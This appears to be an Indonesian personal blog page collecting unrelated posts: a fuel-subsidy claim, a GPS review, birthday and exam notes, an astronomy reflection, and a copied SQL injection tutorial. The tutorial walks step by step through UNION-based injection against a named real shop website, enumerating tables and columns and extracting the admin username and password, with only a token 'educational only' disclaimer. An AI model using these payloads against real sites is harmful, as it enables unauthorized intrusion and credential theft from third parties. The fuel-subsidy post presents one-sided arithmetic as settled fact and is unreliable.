Tak ada yg namanya subsidi BBM, kita dibohongin Pemerintah!!

mengutip artikel yg beredar, berikut adalah petikannya.

Kwik Kian Gie:
Tak ada subsidi BBM. Pemerintah mengambil minyak bumi milik rakyat secara gratis dengan biaya hanya US$ 10/barrel. Tapi karena hanya bisa menjualnya seharga US$ 77/barrel pemerintah merasa rugi jika harga minyak Internasional lebih dari harga itu.

* Indonesia tidak 100% impor!
* Kebutuhan BBM Indonesia 1,2 juta bph.
* Produksi 1 juta bph (dgn biaya < US$ 15/brl)
* Harusnya impor hanya 0,2 juta bph dengan
* biaya Harga Internasional+US$15/barrel


Kebutuhan = 1,2 juta
produksi = 1 juta
impor = 0.2 juta



Jika harga minyak Internasional US$ 125/barrel dan biaya
US$ 15/barrel serta impor 200 ribu bph maka pemerintah
Indonesia dengan harga Rp 4.500/liter (US$ 77/brl) untung
US$ 49,4 juta per hari atau Rp 165,8 Trilyun dalam
setahun (1US@=Rp 9.200).

Pemerintah Untung Rp 165,8 Trilyun!
Bohong besar jika bilang Pemerintah rugi Rp 123 Trilyun!







Review GPS Garmin 60i

Oke..oke..nie gw mau nge-review GPS yang baru aja gw beli, sekalian ngasi testimoni kepada gpsmurah.com abisnya di websitenya gak tersedia fitur buat ngasi testimoni, GPS ini buat keperluan survei, project di Medan, duh, kalo gw udah lulus pingin banget dah ikutan gini, mayan tambah pengalaman...

Gps ini mempunyai specifikasi sbb:
1. waypoint : 500 dengan simbol
2. Track : 10.000 titik
3. Format posisi : Lat/long, UTM, TM3
4. Map datum : 100 pilihan
5. Chanel : 12 chanel
6. Ketelitian dbawah 15 meter
7. Antena : internal dan bisa ditambah external
8. Water proof
9. Batere : 2 x AA tahan sampai 28 jam

Di gpsmurah.com, mayan murah harganya daripada gw beli di bandung, harganya 1,8 jt kalo di sini harganya 1,72 jt beda 80 rebu kan..dah gitu gratis ongkos kirim lagi dari tangerang..

Semula gw pingin beli yang model legend tapi model ini masih pakai kabel serial kalo mau connect ke komputer, tapi yang 60i dah pakai USB, kekurangannya seh bahasanya aja, cuma ada bahasa indonesia jadi agak gimana gitu..heheheh...penggunaannya pun gak ribet - ribet amat, saat mencobanya, pertama kali di antara perumahan di jalan selebar 1,5 m dan kiri kanan nya terdapat rumah, hasilnya 0 alias tidak dapat sinyal dari satelit, lalu gw naik ke atap rumah, buat ngintip orang mandi..ya ngak lah..huhahaha...alhasil, gak sampe 5 menit dapet juga posisi ku berada, dan cepat dapet sinyal dari satelitnya, walaupun ngak ada mapnya...puas dah..

so, penilaian gw buat nie produk nilai 7 lah...

Happy Birthday Once....

Thanks yak teman - teman, buat ucapannya dan doanya..Semoga Tuhan memberkati kalian...huhehehe...hari ni mayan sikit yang ngucapin selamat..mungkin pada lupa yak..mungkin karena di fs gw pun kagak gw bikin show ultah gw..mungkin aja pada kagak inget..heheheh..tapi yang pasti gw senang banget dah pada hari ini, makin tua aja nie gw, umur dah 22..banyak harapan2 yang gw sampaikan tahun ini..semoga jadi kenyataan..
harapan gw yaitu; tahun depan harus lulus kuliah dengan IP yang layak..huahaha, semoga kerja di perusahaan di bidang yang gw kuasain, panjang umur,sehat - sehat, banyak dah, termasuk dapat pacar..:P
semoga Tuhan mengabulinya...AMIN!!!!

Selamat UAN

Wew.. makin lama, makin besar aja nih standar kelulusan yaitu 5,25 jadi inget waktu jaman gw standar kelulusan masi 4....hehehe..tapi gini2 nilai gw mempunyai rata- rata 6...Cukup lah untuk menjadi seorang pengusaha...
Tapi gw setuju juga dengan kenaikan standar nilai, gimana tidak negeri seberang aja yaitu malaysia mempunyai standar 6, kapan kita bisa ngalahin mereka, padahal dulunya mereka yang belajar dari kita..kalau dibawah terus, bisa-bisa di kopi terus kebudaan indonesia ini..heheheh..
gw liat di tipi, kok guru - gurunya jadi pada takut yah??dah gitu rata2 PNS lagi...hehhe..setahu gw seh, guru PNS itu paling nyantai ngajarnya, ngajar ato ngak ngajar tetap jalan tuh gaji...heheh...serius dah, dulu gw sekolah di swasta, beda banget ama teman gw yang sekolah di negeri, kelihatannya lebih nyantai, nyantai kali pun..
So, semangat yak yang UAN..yang ngak UAN juga, persiapkan dirinya buatUAN tahun depan..
siap UAN jangan coret2 baju belum tentu juga lulus lu..huheheh..mending di sumbangin ke yayasan..

sampai jumpa di tempat kuliah dan dunia kerja....

Matahari Sebutir Debu

Pernahkah Anda membayangkan ?


Pada waktu benda-benda angkasa ini diperbandingkan…


Kita menjadi sadar betapa kecilnya bumi dan kita para penghuninya


Jagat raya yang sangat besar


Dalam skala ini, bumi kita tidak kelihatan lagi


Di sini matahari hanya sebesar debu !

Antares adalah bintang ke 15 yang paling terang di angkasa. Jaraknya lebih dari 1000 tahun cahaya dari bumi.

Lalu . . .

siapakah kita?
apakah tujuan hidup kita?
Apa yang membuat hidup kita, manusia, berharga?

SQL Injection(PHP)

Ini gw ambil dari forum, dari teman gw bernama aimar..cocok banget buat pemula, yang masi samar2 apa itu sql injection...enjoy it..


siapkan secangkir kopi dan sebungkus roko...klo bisa sebelah cewe...biar semangat!!

yuks mulai aja

ptama2 cari site yg mau di inject.
contoh:
http://www.zaishu.com.au/shop.php?id=41

skarang tambahkan tanda - di blakang angka 41
http://www.zaishu.com.au/shop.php?id=41

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1
keluar tulisan itu..
kemungkinan bisa di inject nih..

yuk mulai aja...

query pertama kita gunakan UNION SELECT

http://www.zaishu.com.au/shop.php?id=-41+union+select+1/**

nah disini kita mencari angka ajaib..kalo blom kluar terusin nomor setelah select

http://www.zaishu.com.au/shop.php?id=-41+union+select+1,2/**

terusin sampe kluar angka ajaibna
ternyata sampe di angka 14

http://www.zaishu.com.au/shop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/**

nah angka ajaib yg kluar 4,5 dan 11
angka2 inilah yg nanti digunakan.

nah setelah dapet kita cari version,user,database dengan memasukkan query ke angka ajaib tersebut
* version() : current mysql version
* database() : current database where user is connected
* user() : connected to the database
* system_user() : obvious
* session_user()
* current_user()
* last_insert_id()
* connection_id()

kali ini saya akan menggunakan angka 11

http://www.zaishu.com.au/shop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14/**

nah ternyata version 5
sip deh..lanjut lagi...

cek database dan nama usernya

http://www.zaishu.com.au/shop.php?id=-41+union+select+1,2,3,database(),user(),6,7,8,9,10,version(),12,13,14/**

karna angka ajaib ada 3,kita gunakan aja semua...
hasilnya

zaishu_zaishu zaishu_user@localhost

5.0.45-community

skarang kita ngeluarin tablenya
yang kita cari adalah table admin..ok?
query yg kita gunakan adalah

table_name from information_schema.tables where table_schema=database() limit 0,1/*

ok langsung masukin aja..

http://www.zaishu.com.au/shop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1/**

nah ternyata keluar table address_book

ok lanjut lagi...

untuk ngeluarin table berikutnya tinggal di tambahin limitnya menjadi
1,1 2,1 dan seterusnya.
kali ini kita akan mencari table admin..
ternyata sampai 2,1 kluar table admin dengan nama adminrights

sekarang kita cari columnnya.
query yg kita gunakan adalah

column_name from information_schema.columns where table_name=’table_name’ limit 0,1/*

nah table name yg kita cari tadi adalah adminrights
kita rubah dlu menjadi bilangan hexa
menjadi
0x61646d696e726967687473

jadi skarang tinggal kita masukkan.

http://www.zaishu.com.au/shop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14+from+information_schema.columns+where+table_name=0x61646d696e726967687473+limit+0,1/*

nah ternyata kluar column id

selanjutnya kita tinggal tambahkan limitnya
menjadi 1,1 2,1 dst
akan kluar column username,password

langkah selanjutnya tinggal kita kluarin datanya.
kita akan menggunakan query concat()

akan menjadi seperti ini

http://www.zaishu.com.au/shop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,concat(username,0x2D2D,password),12,13,14+from+adminrights/**

Ups,..ternyata kluar login dan password admin

PS:
tanda + hanya sebagai pemisah bisa di ganti dengan spasi
dan tanda 0x2D2D juga sebagai pemisah pada query concat.

note:for educational only..gue ga tanggung jawab ama yg lu lakuin pada ya...
thanks to nakkuta and h4ntu